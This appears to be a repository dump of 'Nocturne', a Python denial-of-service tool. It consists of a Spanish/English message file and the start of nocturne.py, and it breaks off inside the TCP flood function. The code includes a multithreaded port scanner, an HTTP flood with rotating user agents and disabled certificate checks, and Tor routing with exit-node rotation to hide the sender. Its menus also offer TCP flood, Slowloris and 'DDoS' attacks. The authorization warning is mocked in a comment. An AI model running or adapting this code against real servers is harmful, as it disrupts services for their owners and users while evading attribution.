"message": "Mensaje a enviar (opcional)", 20 | "num_sockets": "Número de sockets (default 150)", 21 | "duration": "Duración en segundos (default 60)", 22 | "restart": "¿Ejecutar otra prueba? (s/n)", 23 | "exiting": "Saliendo...", 24 | "error_no_target": "Error: Debes especificar un objetivo", 25 | "error_invalid_option": "Opción no válida", 26 | "error_general": "Error", 27 | "operation_cancelled": "Operación cancelada por el usuario", 28 | "scanning_ports": "Escaneando puertos {}-{} en {}", 29 | "port_open": "Puerto {} ABIERTO ({})", 30 | "scan_complete": "Escaneo completado. Puertos abiertos: {}", 31 | "starting_http_flood": "Iniciando HTTP Flood a {}", 32 | "sending_requests": "Enviando {} requests...", 33 | "request_success": "Request {}/{} - Status: {}", 34 | "request_warning": "Request {}/{} - Status: {}", 35 | "request_error": "Request {}/{} - Error: {}", 36 | "http_summary": "RESUMEN HTTP FLOOD", 37 | "successful_requests": "Requests exitosos", 38 | "failed_requests": "Requests fallidos", 39 | "total_time": "Tiempo total", 40 | "requests_second": "Requests/segundo", 41 | "starting_tcp_flood": "Iniciando TCP Flood a {}:{}", 42 | "establishing_connections": "Estableciendo {} conexiones...", 43 | "connection_established": "Conexión {}: Establecida (Activas: {})", 44 | "connection_error_send": "Conexión {}: Error enviando - {}", 45 | "connection_failed": "Conexión {}: Falló - {}", 46 | "tcp_summary": "RESUMEN TCP FLOOD", 47 | "successful_connections": "Conexiones exitosas", 48 | "starting_slowloris": "Iniciando Slowloris a {}", 49 | "configuring_sockets": "Configurando {} sockets...", 50 | "sockets_connected": "{}/{} sockets conectados", 51 | "sockets_active": "{} sockets conectados y manteniendo conexiones...", 52 | "press_stop": "Presiona Ctrl+C para detener el ataque", 53 | "sockets_active_count": "Sockets activos: {}/{}", 54 | "all_sockets_closed": "Todos los sockets se han cerrado", 55 | "attack_stopped": "Ataque detenido por el usuario", 56 | "sockets_closed": "{} sockets cerrados", 57 | "socket_error": "Error en socket {}: {}", 58 | "starting_ddos": "Iniciando ataque DDoS a {} por {} segundos", 59 | "starting_workers": "Iniciando ataque con múltiples workers...", 60 | "worker_progress": "Worker {}: {} requests enviados", 61 | "time_elapsed": "Tiempo transcurrido: {}s, Requests: {} (~{}/s)", 62 | "attack_interrupted": "Ataque interrumpido", 63 | "ddos_summary": "RESUMEN DDoS", 64 | "total_requests": "Total requests", 65 | "result": "RESULTADO: {} puertos abiertos: {}" 66 | }, 67 | "english": { 68 | "banner": "LOAD TESTING DDOS, DOS, HTTP, TCP, SLOWLORIS, PORT SCANNER", 69 | "warning": "WARNING: Use only on systems with explicit authorization", 70 | "warning_legal": "Misuse of this tool may be illegal", 71 | "enter_target": "Enter target URL or IP", 72 | "select_attack": "SELECT ATTACK TYPE", 73 | "port_scan": "Port Scan", 74 | "http_flood": "HTTP Flood", 75 | "tcp_flood": "TCP Flood", 76 | "slowloris": "Slowloris Attack", 77 | "ddos_sim": "DDoS (Multiple techniques)", 78 | "option": "Option (1-5)", 79 | "start_port": "Start port (default 1)", 80 | "end_port": "End port (default 1000)", 81 | "num_requests": "Number of requests", 82 | "delay": "Delay between requests (default 0.1)", 83 | "target_port": "Target port", 84 | "num_connections": "Number of connections", 85 | "message": "Message to send (optional)", 86 | "num_sockets": "Number of sockets (default 150)", 87 | "duration": "Duration in seconds (default 60)", 88 | "restart": "Run another test? (y/n)", 89 | "exiting": "Exiting...", 90 | "error_no_target": "Error: You must specify a target", 91 | "error_invalid_option": "Invalid option", 92 | "error_general": "Error", 93 | "operation_cancelled": "Operation cancelled by user", 94 | "scanning_ports": "Scanning ports {}-{} on {}", 95 | "port_open": "Port {} OPEN ({})", 96 | "scan_complete": "Scan completed. Open ports: {}", 97 | "starting_http_flood": "Starting HTTP Flood to {}", 98 | "sending_requests": "Sending {} requests...", 99 | "request_success": "Request {}/{} - Status: {}", 100 | "request_warning": "Request {}/{} - Status: {}", 101 | "request_error": "Request {}/{} - Error: {}", 102 | "http_summary": "HTTP FLOOD SUMMARY", 103 | "successful_requests": "Successful requests", 104 | "failed_requests": "Failed requests", 105 | "total_time": "Total time", 106 | "requests_second": "Requests/second", 107 | "starting_tcp_flood": "Starting TCP Flood to {}:{}", 108 | "establishing_connections": "Establishing {} connections...", 109 | "connection_established": "Connection {}: Established (Active: {})", 110 | "connection_error_send": "Connection {}: Send error - {}", 111 | "connection_failed": "Connection {}: Failed - {}", 112 | "tcp_summary": "TCP FLOOD SUMMARY", 113 | "successful_connections": "Successful connections", 114 | "starting_slowloris": "Starting Slowloris to {}", 115 | "configuring_sockets": "Configuring {} sockets...", 116 | "sockets_connected": "{}/{} sockets connected", 117 | "sockets_active": "{} sockets connected and maintaining connections...", 118 | "press_stop": "Press Ctrl+C to stop attack", 119 | "sockets_active_count": "Active sockets: {}/{}", 120 | "all_sockets_closed": "All sockets have been closed", 121 | "attack_stopped": "Attack stopped by user", 122 | "sockets_closed": "{} sockets closed", 123 | "socket_error": "Socket {} error: {}", 124 | "starting_ddos": "Starting DDoS attack to {} for {} seconds", 125 | "starting_workers": "Starting attack with multiple workers...", 126 | "worker_progress": "Worker {}: {} requests sent", 127 | "time_elapsed": "Time elapsed: {}s, Requests: {} (~{}/s)", 128 | "attack_interrupted": "Attack interrupted", 129 | "ddos_summary": "DDoS SUMMARY", 130 | "total_requests": "Total requests", 131 | "result": "RESULT: {} open ports: {}" 132 | } 133 | } 134 | 135 | -------------------------------------------------------------------------------- /nocturne.py: -------------------------------------------------------------------------------- 1 | import os 2 | import logging 3 | import time 4 | import socket 5 | import sys 6 | import json 7 | import os.path 8 | import threading 9 | import random 10 | import requests 11 | import stem 12 | import stem.control 13 | from concurrent.futures import ThreadPoolExecutor 14 | from urllib3.util.retry import Retry 15 | from urllib3.exceptions import MaxRetryError 16 | from requests.adapters import HTTPAdapter 17 | from urllib.parse import urlparse 18 | 19 | # Tor configuracion 20 | TOR_SOCKS_PORT = 9050 # Puerto default del socket 21 | TOR_CONTROL_PORT = 9051 # Puerto de control por defecto 22 | TOR_PASSWORD = None # Contraseña si está configurada en torrc 23 | TOR_NEW_IDENTITY_DELAY = 5 # Segundos a esperar después de rotar IP 24 | 25 | # CERTIFICACIÓN HTTPS Y MEJORA VISUAL POR ERROR DE CERTIFICACIÓN HTTPS LO PONGO PARA EVITAR QUE HAYA ERRORES VISUALES 26 | import urllib3 27 | urllib3.disable_warnings() 28 | logging.captureWarnings(True) 29 | # VULNERABILIDADES EN SERVIDORES O SISTEMAS EN LOS QUE TENGAN AUTORIZACIÓN, ¿VERDAD? 30 | 31 | # Configuration configuracion 32 | class Config: 33 | CONFIG_FILE = os.path.expanduser('~/.nocturne_config.json') 34 | 35 | # Valores por defecto 36 | _defaults = { 37 | 'LANGUAGE': 'english', 38 | 'EMOJIS': False, 39 | 'MAX_WORKERS': 200, 40 | 'USE_TOR': True, 41 | 'TOR_ROTATION_INTERVAL': 30 42 | } 43 | 44 | # Cargar configuración al inicio 45 | @classmethod 46 | def load_config(cls): 47 | if os.path.exists(cls.CONFIG_FILE): 48 | try: 49 | with open(cls.CONFIG_FILE, 'r') as f: 50 | config = json.load(f) 51 | for key, value in config.items(): 52 | if key in cls._defaults: 53 | setattr(cls, key, value) 54 | except Exception as e: 55 | print(f"Error loading config: {e}") 56 | # Si hay un error, usar valores por defecto 57 | for key, value in cls._defaults.items(): 58 | setattr(cls, key, value) 59 | else: 60 | # Usar valores por defecto si no existe el archivo 61 | for key, value in cls._defaults.items(): 62 | setattr(cls, key, value) 63 | 64 | # Guardar configuración 65 | @classmethod 66 | def save_config(cls): 67 | try: 68 | config = {} 69 | for key in cls._defaults: 70 | config[key] = getattr(cls, key, cls._defaults[key]) 71 | 72 | with open(cls.CONFIG_FILE, 'w') as f: 73 | json.dump(config, f, indent=4) 74 | except Exception as e: 75 | print(f"Error saving config: {e}") 76 | 77 | # Cargar configuración al iniciar 78 | Config.load_config() 79 | 80 | class TorController: 81 | def __init__(self, control_port=TOR_CONTROL_PORT, password=TOR_PASSWORD): 82 | self.control_port = control_port 83 | self.password = password 84 | self.controller = None 85 | 86 | def __enter__(self): 87 | try: 88 | self.controller = stem.control.Controller.from_port(port=self.control_port) 89 | if self.password: 90 | self.controller.authenticate(self.password) 91 | else: 92 | self.controller.authenticate() 93 | return self 94 | except Exception as e: 95 | print(f"Error connecting to Tor control port: {e}") 96 | return None 97 | 98 | def __exit__(self, exc_type, exc_val, exc_tb): 99 | if self.controller: 100 | self.controller.close() 101 | 102 | def new_identity(self): 103 | """Solicita una nueva identidad de Tor (nodo de salida).""" 104 | if not self.controller: 105 | print("Error: Controlador Tor no inicializado") 106 | return False 107 | 108 | try: 109 | # Forzar una nueva identidad 110 | self.controller.signal(stem.Signal.NEWNYM) 111 | 112 | # Esperar el tiempo recomendado para evitar problemas 113 | wait_time = max(self.controller.get_newnym_wait() or 5, 5) 114 | print(f"Rotando IP. Esperando {wait_time} segundos...") 115 | time.sleep(wait_time) 116 | 117 | # Verificar si la IP cambió 118 | old_ip = self.get_current_ip() 119 | time.sleep(1) 120 | new_ip = self.get_current_ip() 121 | 122 | if old_ip and new_ip and old_ip != new_ip: 123 | print(f"IP rotada exitosamente: {old_ip} -> {new_ip}") 124 | return True 125 | else: 126 | print("Advertencia: No se pudo verificar el cambio de IP") 127 | return False 128 | 129 | except Exception as e: 130 | print(f"Error al rotar la identidad: {e}") 131 | return False 132 | 133 | def get_current_ip(self, session=None): 134 | """Obte """ 135 | try: 136 | if session is None: 137 | session = self.get_tor_session() 138 | return session.get('https://api.ipify.org').text 139 | except Exception as e: 140 | print(f"Error getting IP: {e}") 141 | return None 142 | 143 | @classmethod 144 | def get_tor_session(cls): 145 | """Crea una sesión requests que usa Tor con configuración mejorada.""" 146 | session = requests.session() 147 | 148 | # Configurar proxy Tor 149 | session.proxies = { 150 | 'http': f'socks5h://127.0.0.1:{TOR_SOCKS_PORT}', 151 | 'https': f'socks5h://127.0.0.1:{TOR_SOCKS_PORT}' 152 | } 153 | 154 | # Configurar timeout 155 | session.timeout = 30 156 | 157 | # Configurar headers comunes 158 | session.headers.update({ 159 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0', 160 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 161 | 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 162 | 'Connection': 'keep-alive', 163 | 'Upgrade-Insecure-Requests': '1', 164 | 'Sec-Fetch-Dest': 'document', 165 | 'Sec-Fetch-Mode': 'navigate', 166 | 'Sec-Fetch-Site': 'none', 167 | 'Sec-Fetch-User': '?1', 168 | 'Cache-Control': 'max-age=0', 169 | }) 170 | 171 | # Configurar reintentos 172 | retry_strategy = Retry( 173 | total=3, 174 | backoff_factor=1, 175 | status_forcelist=[429, 500, 502, 503, 504], 176 | allowed_methods=["GET", "POST"] 177 | ) 178 | 179 | adapter = HTTPAdapter(max_retries=retry_strategy) 180 | session.mount("http://", adapter) 181 | session.mount("https://", adapter) 182 | 183 | return session 184 | 185 | 186 | class Translator: 187 | def __init__(self): 188 | self.messages = { #La ia (copilot) me ayudo con esta tarea repetitiva 189 | "spanish": { 190 | "settings_title": "CONFIGURACIÓN", 191 | "current_language": "Idioma actual", 192 | "use_tor": "Usar Tor", 193 | "yes": "Sí", 194 | "no": "No", 195 | "back_to_menu": "Volver al menú principal", 196 | "select_option": "Seleccione una opción", 197 | "enabled": "activado", 198 | "disabled": "desactivado", 199 | "banner": "HERRAMIENTA DE PRUEBAS DDOS, DOS, HTTP, TCP, SLOWLORIS, PORT SCANNER", 200 | "warning": "ADVERTENCIA: Usa solo en sistemas con autorización explícita", 201 | "warning_legal": "El mal uso de esta herramienta puede ser ilegal", 202 | "enter_target": "Ingresa URL o IP del objetivo", 203 | "select_attack": "SELECCIONA EL TIPO DE ATAQUE", 204 | "port_scan": "Escaneo de Puertos", 205 | "http_flood": "HTTP Flood", 206 | "tcp_flood": "TCP Flood", 207 | "slowloris": "Slowloris Attack", 208 | "ddos_sim": "DDoS", 209 | "option": "Opción (1-5)", 210 | "start_port": "Puerto inicial (default 1)", 211 | "end_port": "Puerto final (default 1000)", 212 | "num_requests": "Número de requests", 213 | "delay": "Delay entre requests (default 0.1)", 214 | "target_port": "Puerto objetivo", 215 | "num_connections": "Número de conexiones", 216 | "message": "Mensaje a enviar (opcional)", 217 | "num_sockets": "Número de sockets (default 150)", 218 | "duration": "Duración en segundos (default 60)", 219 | "restart": "¿Ejecutar otra prueba? (s/n)", 220 | "exiting": "Saliendo...", 221 | "error_no_target": "Error: Debes especificar un objetivo", 222 | "error_invalid_option": "Opción no válida", 223 | "error_general": "Error", 224 | "operation_cancelled": "Operación cancelada por el usuario", 225 | "scanning_ports": "Escaneando puertos {}-{} en {}", 226 | "port_open": "Puerto {} ABIERTO ({})", 227 | "scan_complete": "Escaneo completado. Puertos abiertos: {}", 228 | "starting_http_flood": "Iniciando HTTP Flood a {}", 229 | "sending_requests": "Enviando {} requests...", 230 | "request_success": "Request {}/{} - Status: {}", 231 | "request_warning": "Request {}/{} - Status: {}", 232 | "request_error": "Request {}/{} - Error: {}", 233 | "http_summary": "RESUMEN HTTP FLOOD", 234 | "successful_requests": "Requests exitosos", 235 | "failed_requests": "Requests fallidos", 236 | "main_menu": "MENÚ PRINCIPAL", 237 | "exit": "Salir", 238 | "port_scan_title": "ESCANEO DE PUERTOS", 239 | "http_flood_title": "HTTP FLOOD", 240 | "tcp_flood_title": "TCP FLOOD", 241 | "slowloris_title": "SLOWLORIS", 242 | "ddos_title": "ATAQUE DDoS", 243 | "enter_ip_or_domain": "Ingrese la dirección IP o dominio:", 244 | "start_port_prompt": "Puerto inicial (predeterminado 1):", 245 | "end_port_prompt": "Puerto final (predeterminado 1000):", 246 | "enter_url": "Ingrese la URL objetivo (ej: http://ejemplo.com):", 247 | "num_requests_prompt": "Número de peticiones:", 248 | "delay_prompt": "Tiempo entre peticiones en segundos (predeterminado 0.1):", 249 | "enter_ip": "Ingrese la dirección IP objetivo:", 250 | "port_prompt": "Puerto objetivo:", 251 | "num_connections_prompt": "Número de conexiones:", 252 | "message_prompt": "Mensaje a enviar (opcional):", 253 | "num_sockets_prompt": "Número de sockets (predeterminado 150):", 254 | "duration_prompt": "Duración en segundos (predeterminado 60):", 255 | "scan_completed": "Escaneo completado. Puertos abiertos: {}", 256 | "starting_attack": "Iniciando ataque a {}", 257 | "app_terminated": "Aplicación terminada por el usuario", 258 | "critical_error": "Error crítico", 259 | "total_time": "Tiempo total", 260 | "requests_second": "Requests/segundo", 261 | "starting_tcp_flood": "Iniciando TCP Flood a {}:{}", 262 | "establishing_connections": "Estableciendo {} conexiones...", 263 | "connection_established": "Conexión {}: Establecida (Activas: {})", 264 | "connection_error_send": "Conexión {}: Error enviando - {}", 265 | "connection_failed": "Conexión {}: Falló - {}", 266 | "tcp_summary": "RESUMEN TCP FLOOD", 267 | "successful_connections": "Conexiones exitosas", 268 | "starting_slowloris": "Iniciando Slowloris a {}", 269 | "configuring_sockets": "Configurando {} sockets...", 270 | "sockets_connected": "{}/{} sockets conectados", 271 | "sockets_active": "{} sockets conectados y manteniendo conexiones...", 272 | "press_stop": "Presiona Ctrl+C para detener el ataque", 273 | "sockets_active_count": "Sockets activos: {}/{}", 274 | "all_sockets_closed": "Todos los sockets se han cerrado", 275 | "attack_stopped": "Ataque detenido por el usuario", 276 | "sockets_closed": "{} sockets cerrados", 277 | "socket_error": "Error en socket {}: {}", 278 | "starting_ddos": "Iniciando ataque DDoS a {} por {} segundos", 279 | "starting_workers": "Iniciando ataque con múltiples workers...", 280 | "worker_progress": "Worker {}: {} requests enviados", 281 | "time_elapsed": "Tiempo transcurrido: {}s, Requests: {} (~{}/s)", 282 | "attack_interrupted": "Ataque interrumpido", 283 | "ddos_summary": "RESUMEN DDoS", 284 | "total_requests": "Total requests", 285 | "result": "RESULTADO: {} puertos abiertos: {}" 286 | }, 287 | "english": { 288 | "settings_title": "SETTINGS", 289 | "current_language": "Current language", 290 | "use_tor": "Use Tor", 291 | "yes": "Yes", 292 | "no": "No", 293 | "back_to_menu": "Back to main menu", 294 | "select_option": "Select an option", 295 | "enabled": "enabled", 296 | "disabled": "disabled", 297 | "banner": "LOAD TESTING DDOS, DOS, HTTP, TCP, SLOWLORIS, PORT SCANNER", 298 | "warning": "WARNING: Use only on systems with explicit authorization", 299 | "warning_legal": "Misuse of this tool may be illegal", 300 | "enter_target": "Enter target URL or IP", 301 | "select_attack": "SELECT ATTACK TYPE", 302 | "port_scan": "Port Scan", 303 | "http_flood": "HTTP Flood", 304 | "tcp_flood": "TCP Flood", 305 | "slowloris": "Slowloris Attack", 306 | "ddos_sim": "DDoS (Multiple techniques)", 307 | "option": "Option (1-5)", 308 | "start_port": "Start port (default 1)", 309 | "end_port": "End port (default 1000)", 310 | "num_requests": "Number of requests", 311 | "delay": "Delay between requests (default 0.1)", 312 | "target_port": "Target port", 313 | "num_connections": "Number of connections", 314 | "message": "Message to send (optional)", 315 | "num_sockets": "Number of sockets (default 150)", 316 | "duration": "Duration in seconds (default 60)", 317 | "restart": "Run another test? (y/n)", 318 | "exiting": "Exiting...", 319 | "error_no_target": "Error: You must specify a target", 320 | "error_invalid_option": "Invalid option", 321 | "error_general": "Error", 322 | "operation_cancelled": "Operation cancelled by user", 323 | "scanning_ports": "Scanning ports {}-{} on {}", 324 | "port_open": "Port {} OPEN ({})", 325 | "scan_complete": "Scan completed. Open ports: {}", 326 | "starting_http_flood": "Starting HTTP Flood to {}", 327 | "sending_requests": "Sending {} requests...", 328 | "request_success": "Request {}/{} - Status: {}", 329 | "request_warning": "Request {}/{} - Status: {}", 330 | "request_error": "Request {}/{} - Error: {}", 331 | "http_summary": "HTTP FLOOD SUMMARY", 332 | "successful_requests": "Successful requests", 333 | "failed_requests": "Failed requests", 334 | "main_menu": "MAIN MENU", 335 | "exit": "Exit", 336 | "port_scan_title": "PORT SCAN", 337 | "http_flood_title": "HTTP FLOOD", 338 | "tcp_flood_title": "TCP FLOOD", 339 | "slowloris_title": "SLOWLORIS", 340 | "ddos_title": "DDoS ATTACK", 341 | "enter_ip_or_domain": "Enter IP address or domain:", 342 | "start_port_prompt": "Start port (default 1):", 343 | "end_port_prompt": "End port (default 1000):", 344 | "enter_url": "Enter target URL (e.g., http://example.com):", 345 | "num_requests_prompt": "Number of requests:", 346 | "delay_prompt": "Time between requests in seconds (default 0.1):", 347 | "enter_ip": "Enter target IP address:", 348 | "port_prompt": "Target port:", 349 | "num_connections_prompt": "Number of connections:", 350 | "message_prompt": "Message to send (optional):", 351 | "num_sockets_prompt": "Number of sockets (default 150):", 352 | "duration_prompt": "Duration in seconds (default 60):", 353 | "scan_completed": "Scan completed. Open ports: {}", 354 | "starting_attack": "Starting attack to {}", 355 | "app_terminated": "Application terminated by user", 356 | "critical_error": "Critical error", 357 | "total_time": "Total time", 358 | "requests_second": "Requests/second", 359 | "starting_tcp_flood": "Starting TCP Flood to {}:{}", 360 | "establishing_connections": "Establishing {} connections...", 361 | "connection_established": "Connection {}: Established (Active: {})", 362 | "connection_error_send": "Connection {}: Send error - {}", 363 | "connection_failed": "Connection {}: Failed - {}", 364 | "tcp_summary": "TCP FLOOD SUMMARY", 365 | "successful_connections": "Successful connections", 366 | "starting_slowloris": "Starting Slowloris to {}", 367 | "configuring_sockets": "Configuring {} sockets...", 368 | "sockets_connected": "{}/{} sockets connected", 369 | "sockets_active": "{} sockets connected and maintaining connections...", 370 | "press_stop": "Press Ctrl+C to stop attack", 371 | "sockets_active_count": "Active sockets: {}/{}", 372 | "all_sockets_closed": "All sockets have been closed", 373 | "attack_stopped": "Attack stopped by user", 374 | "sockets_closed": "{} sockets closed", 375 | "socket_error": "Socket {} error: {}", 376 | "starting_ddos": "Starting DDoS attack to {} for {} seconds", 377 | "starting_workers": "Starting attack with multiple workers...", 378 | "worker_progress": "Worker {}: {} requests sent", 379 | "time_elapsed": "Time elapsed: {}s, Requests: {} (~{}/s)", 380 | "attack_interrupted": "Attack interrupted", 381 | "ddos_summary": "DDoS SUMMARY", 382 | "total_requests": "Total requests", 383 | "result": "RESULT: {} open ports: {}" 384 | } 385 | } 386 | 387 | def get(self, key): 388 | lang = getattr(Config, 'LANGUAGE', 'english') 389 | return self.messages.get(lang, {}).get(key, self.messages['english'].get(key, key)) 390 | 391 | 392 | # Initialize translator 393 | t = Translator() 394 | 395 | 396 | def restart_program(): 397 | python = sys.executable 398 | os.execl(python, python, *sys.argv) 399 | 400 | # ::' Art by 401 | # :: :. Ronald Allan Stanions 402 | 403 | #GRACIAS RONALD, POR HACER PÚBLICA TU ARTE, DE CORAZÓN, NOCTURNE... 404 | 405 | def get_random_banner(): 406 | banners = [ 407 | # Banner 1 - Estilo original mi favorito la verdad jsjs 408 | r''' 409 | .:' NOCTURNE ATTACK `:. 410 | ::' `:: 411 | :: :. .:!!. .:!!. .: :: 412 | `:. `:. !::! !::! .:' .:' 413 | `::. `:: !:::'!. .!':::! ::' .::' 414 | `::.`::. `!:'`:::::'':!' .::'.::' 415 | `:. `::::' `!!' '::::' ::' 416 | :'*:::. .:' !! `:. .:::*`: 417 | :: HHH::. ` !! ' .::HHH :: 418 | ::: `H TH::. `!! .::HT H' ::: 419 | ::.. `THHH:`: :':HHHT' ..:: 420 | `:: `T: `. .' :T' ::' 421 | `:. . : > < : . .:' 422 | `::' \ / `::' 423 | :' .`. \__/ .'. `: 424 | :' ::. .:: `: 425 | :' `::: :::' `: 426 | `. `` '' .' 427 | :`...........': 428 | ` :`. .': ' 429 | `: `"""' :' @Nocturne 430 | ''', 431 | # Banner 2 - Estilo alternativo 1 me gusta mucho 432 | r''' 433 | ███╗ ██╗ ██████╗ ██████╗████████╗██╗ ██╗██████╗ ███╗ ██╗███████╗ 434 | ████╗ ██║██╔═══██╗██╔════╝╚══██╔══╝██║ ██║██╔══██╗████╗ ██║██╔════╝ 435 | ██╔██╗ ██║██║ ██║██║ ██║ ██║ ██║██████╔╝██╔██╗ ██║█████╗ 436 | ██║╚██╗██║██║ ██║██║ ██║ ██║ ██║██╔══██╗██║╚██╗██║██╔══╝ 437 | ██║ ╚████║╚██████╔╝╚██████╗ ██║ ╚██████╔╝██║ ██║██║ ╚████║███████╗ 438 | ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝ 439 | ====================================================================== 440 | ''', 441 | # Banner 3 - Estilo alternativo 2 meh 442 | r''' 443 | ╔╦╗╔═╗ ╔═╗╔╦╗╦ ╦╔═╗╔╗╔╔╦╗ ╔═╗╔╦╗╔═╗╔═╗╔╦╗ 444 | ║║║╠═╣ ║ ║ ║ ║║ ║║║║ ║║ ╠═╣ ║║║╣ ║ ║ 445 | ╩ ╩╩ ╩ ╚═╝ ╩ ╚═╝╚═╝╝╚╝═╩╝ ╩ ╩═╩╝╚═╝╚═╝ ╩ 446 | ========================================= 447 | ''', 448 | # Banner 4 - Estilo alternativo 3 me encanta que parezca cascada, este y el de arriba los creo chatGPT 449 | r''' 450 | ░▒▓███████▓▒░ ▒█████ ▒█████ ▄▄▄█████▓ 451 | ░▒▓█ ▓███▄▒▒██▒ ██▒▒██▒ ██▒▓ ██▒ ▓▒ 452 | ░▒███ ▓██▓ ▒██░ ██▒▒██░ ██▒▒ ▓██░ ▒░ 453 | ░▒▓█ ░██▒ ░██ █▀ ▒██ ██░░ ▓██▓ ░ 454 | ░░▒████▓▓ ░▒█████▓ ░ ████▓▒░ ▒██▒ ░ 455 | ░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░▒░▒░ ▒ ░░ 456 | ░ ▒ ▒░ ░░▒░ ░ ░ ░ ▒ ▒░ ░ 457 | ░ ░ ░ ▒ ░░░ ░ ░ ░ ░ ░ ▒ ░ 458 | ░ ░ ░ ░ ░ 459 | =============================== 460 | ''' 461 | ] 462 | return random.choice(banners) 463 | 464 | def print_banner(): 465 | # Mostrar un banner aleatorio, y... siii lo admito, me inspire en metasploit 466 | print(get_random_banner()) 467 | 468 | 469 | def display_menu(): 470 | """Display interactive menu "segun es interactivo jeje""" 471 | print("\n" + "=" * 60) 472 | print(f" {t.get('banner')}") 473 | print("=" * 60) 474 | print(f"️ {t.get('warning')}") 475 | print(f"️ {t.get('warning_legal')}") 476 | print("=" * 60) 477 | 478 | 479 | def restart_program(): 480 | """Reinicia el programa para aplicar los cambios de configuración""" 481 | python = sys.executable 482 | os.execl(python, python, *sys.argv) 483 | 484 | def get_language_selection(): 485 | """Obtiene la selección de idioma del usuario""" 486 | print("\nSelect language / Selecciona idioma:") 487 | print("1. English") 488 | print("2. Español") 489 | choice = input("Choice / Opción (1-2): ").strip() 490 | 491 | if choice == '2': 492 | Config.LANGUAGE = "spanish" 493 | Config.EMOJIS = False 494 | else: 495 | Config.LANGUAGE = "english" 496 | Config.EMOJIS = True # Asegurarse de que los emojis estén activados para inglés 497 | 498 | 499 | def format_message(message): 500 | """Format message with or without emojis based on configuration""" 501 | if Config.EMOJIS: 502 | return message 503 | # Remove emojis for English/professional mode 504 | emoji_map = { 505 | '🔍': '[SCAN]', '✅': '[OK]', '🎯': '[TARGET]', '🌊': '[FLOOD]', 506 | '🚀': '[START]', '⚠️': '[WARN]', '❌': '[ERROR]', '📊': '[STATS]', 507 | '⏱️': '[TIME]', '📈': '[RATE]', '🌐': '[NETWORK]', '🔗': '[CONN]', 508 | '📦': '[PACKET]', '🐌': '[SLOW]', '🔧': '[CONFIG]', '📡': '[SOCKET]', 509 | '⏸️': '[PAUSE]', '💥': '[EXPLOSION]', '🛑': '[STOP]', '🔒': '[LOCK]', 510 | '🛠️': '[TOOL]', '🎲': '[CHOICE]', '🔢': '[NUMBER]', '💬': '[MESSAGE]', 511 | '🔄': '[RESTART]', '👋': '[EXIT]' 512 | } 513 | for emoji, replacement in emoji_map.items(): 514 | message = message.replace(emoji, replacement) 515 | return message 516 | 517 | 518 | def port_scan(host, start_port=1, end_port=1000): 519 | """Enhanced port scanning""" 520 | print(format_message(t.get('scanning_ports').format(start_port, end_port, host))) 521 | open_ports = [] 522 | 523 | def scan_port(port): 524 | try: 525 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 526 | s.settimeout(1) 527 | result = s.connect_ex((host, port)) 528 | if result == 0: 529 | try: 530 | service = socket.getservbyport(port) 531 | except: 532 | service = "unknown" 533 | print(format_message(t.get('port_open').format(port, service))) 534 | return port 535 | except: 536 | pass 537 | return None 538 | 539 | with ThreadPoolExecutor(max_workers=Config.MAX_WORKERS) as executor: 540 | results = executor.map(scan_port, range(start_port, end_port + 1)) 541 | open_ports = [port for port in results if port is not None] 542 | 543 | print(format_message(t.get('scan_complete').format(len(open_ports)))) 544 | return open_ports 545 | 546 | 547 | def http_flood(target_url, num_requests, delay=0.1): 548 | """Enhanced HTTP Flood attack""" 549 | print(format_message(t.get('starting_http_flood').format(target_url))) 550 | 551 | # Normalize URL 552 | if not target_url.startswith(('http://', 'https://')): 553 | target_url = 'http://' + target_url 554 | 555 | user_agents = [ 556 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 557 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 558 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 559 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0', 560 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0' 561 | ] 562 | 563 | success_count = 0 564 | failed_count = 0 565 | 566 | def send_request(request_num): 567 | nonlocal success_count, failed_count 568 | try: 569 | headers = { 570 | 'User-Agent': random.choice(user_agents), 571 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 572 | 'Accept-Language': 'en-US,en;q=0.9', 573 | 'Connection': 'keep-alive', 574 | 'Cache-Control': 'no-cache', 575 | 'Pragma': 'no-cache' 576 | } 577 | 578 | response = requests.get(target_url, headers=headers, timeout=10, verify=False) 579 | if response.status_code < 400: 580 | success_count += 1 581 | print(format_message(t.get('request_success').format(request_num, num_requests, response.status_code))) 582 | else: 583 | failed_count += 1 584 | print(format_message(t.get('request_warning').format(request_num, num_requests, response.status_code))) 585 | 586 | except Exception as e: 587 | failed_count += 1 588 | error_msg = str(e)[:50] + "..." if len(str(e)) > 50 else str(e) 589 | print(format_message(t.get('request_error').format(request_num, num_requests, error_msg))) 590 | 591 | print(format_message(t.get('sending_requests').format(num_requests))) 592 | start_time = time.time() 593 | 594 | with ThreadPoolExecutor(max_workers=50) as executor: 595 | executor.map(send_request, range(1, num_requests + 1)) 596 | 597 | end_time = time.time() 598 | total_time = end_time - start_time 599 | 600 | print(f"\n{t.get('http_summary')}:") 601 | print(f"{t.get('successful_requests')}: {success_count}") 602 | print(f"{t.get('failed_requests')}: {failed_count}") 603 | print(f"{t.get('total_time')}: {total_time:.2f} seconds") 604 | print(f"{t.get('requests_second')}: {num_requests / total_time:.2f}") 605 | 606 | return success_count 607 | 608 | 609 | def tcp_flood(target_ip, target_port, num_connections, message): 610 | """Enhanced TCP Flood attack""" 611 | print(format_message(t.get('starting_tcp_flood').format(target_ip, target_port))) 612 | 613 | if not message: 614 | message = "TCP Flood Test Packet" 615 | if isinstance(message, str): 616 | message = 